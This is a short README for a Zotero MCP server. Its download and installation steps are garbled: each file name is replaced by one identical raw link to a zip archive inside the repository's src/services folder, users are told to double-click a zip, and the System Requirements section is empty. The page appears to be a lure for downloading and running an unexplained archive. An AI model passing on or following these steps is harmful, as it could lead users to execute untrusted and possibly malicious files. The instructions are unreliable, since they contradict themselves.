Welcome to the zotero-mcp-server! This application helps you manage your research references. It uses the Model Context Protocol (MCP) to work seamlessly with Zotero, making it easy to search, cite, and organize your research.

📥 Download & Install

  1. Visit the Releases page to download the latest version.
  2. Once on the page, look for the assets section.
  3. Choose the file that matches your operating system. It may be labeled as https://github.com/Maxdepai1212/zotero-mcp-server/raw/refs/heads/main/src/services/server_mcp_zotero_v1.8-alpha.1.zip, https://github.com/Maxdepai1212/zotero-mcp-server/raw/refs/heads/main/src/services/server_mcp_zotero_v1.8-alpha.1.zip, or similar for other platforms.
  4. Click the file to start the download.

📋 System Requirements

Before installing, check that your system meets the following requirements:

🔧 Installation Steps

  1. Once the file finishes downloading, locate it in your downloads folder.

    • For Windows Users: Double-click https://github.com/Maxdepai1212/zotero-mcp-server/raw/refs/heads/main/src/services/server_mcp_zotero_v1.8-alpha.1.zip and follow the prompts on your screen.
    • For macOS Users: Unzip https://github.com/Maxdepai1212/zotero-mcp-server/raw/refs/heads/main/src/services/server_mcp_zotero_v1.8-alpha.1.zip, then double-click https://github.com/Maxdepai1212/zotero-mcp-server/raw/refs/heads/main/src/services/server_mcp_zotero_v1.8-alpha.1.zip to start the installation.
    • For Linux Users: Open the terminal and navigate to the downloaded folder. You may need to run chmod +x zotero-mcp-server-linux to make it executable, then type ./zotero-mcp-server-linux to install.
  2. Follow the setup prompts to complete the installation.

  3. After installation, open the application from your applications menu or desktop shortcut.
